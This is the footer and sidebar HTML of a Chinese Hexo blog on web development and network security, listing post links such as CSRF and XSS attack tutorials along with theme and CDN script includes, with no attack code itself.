    <span><a href="/2022/01/13/%E4%BF%AE%E6%94%B9/CSS%E8%AF%AD%E6%B3%95%E4%B8%8E%E9%80%89%E6%8B%A9%E5%99%A8/" title="CSS语法与选择器">CSS语法与选择器</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/01/18/%E4%BF%AE%E6%94%B9/%E8%99%9A%E6%8B%9F%E7%9B%AE%E5%BD%95%EF%BC%9A%E5%88%9B%E5%BB%BA%E8%99%9A%E6%8B%9F%E5%AD%90%E7%BD%91%E7%AB%99/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" title="分类于 信息安全—网络渗透">信息安全—网络渗透</a>
</div>

    <span><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/CRSF%E6%94%BB%E5%87%BB/" title="CSRF跨站脚本攻击">CSRF跨站脚本攻击</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E5%B8%B8%E7%94%A8%E7%9F%A5%E8%AF%86/MSSQL%E5%AE%89%E8%A3%85/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" title="分类于 信息安全—网络渗透">信息安全—网络渗透</a>
</div>

    <span><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.2%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" title="计算机的基本概念">计算机的基本概念</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="分类于 web前端">web前端</a>
</div>

    <span><a href="/2022/01/14/%E4%BF%AE%E6%94%B9/css%E6%A0%B7%E5%BC%8F%E3%80%81%E7%BB%A7%E6%89%BF%E3%80%81%E6%9D%83%E9%87%8D/" title="css样式、继承、权重">css样式、继承、权重</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" title="分类于 信息安全—网络渗透">信息安全—网络渗透</a>
</div>

    <span><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/2.2FTP-DNS%E6%9C%8D%E5%8A%A1/" title="FTP&#x2F;DNS服务">FTP/DNS服务</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" title="分类于 信息安全—网络渗透">信息安全—网络渗透</a>
</div>

    <span><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.3HTTP%E9%80%9A%E4%BF%A1%E5%9F%BA%E7%A1%80/" title="计算机的基本概念">计算机的基本概念</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" title="分类于 信息安全—网络渗透">信息安全—网络渗透</a>
</div>

    <span><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/XSS%E6%94%BB%E5%87%BB/" title="XSS攻击">XSS攻击</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/03/04/信息安全/第二阶段/第一周/BurpSuite使用/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
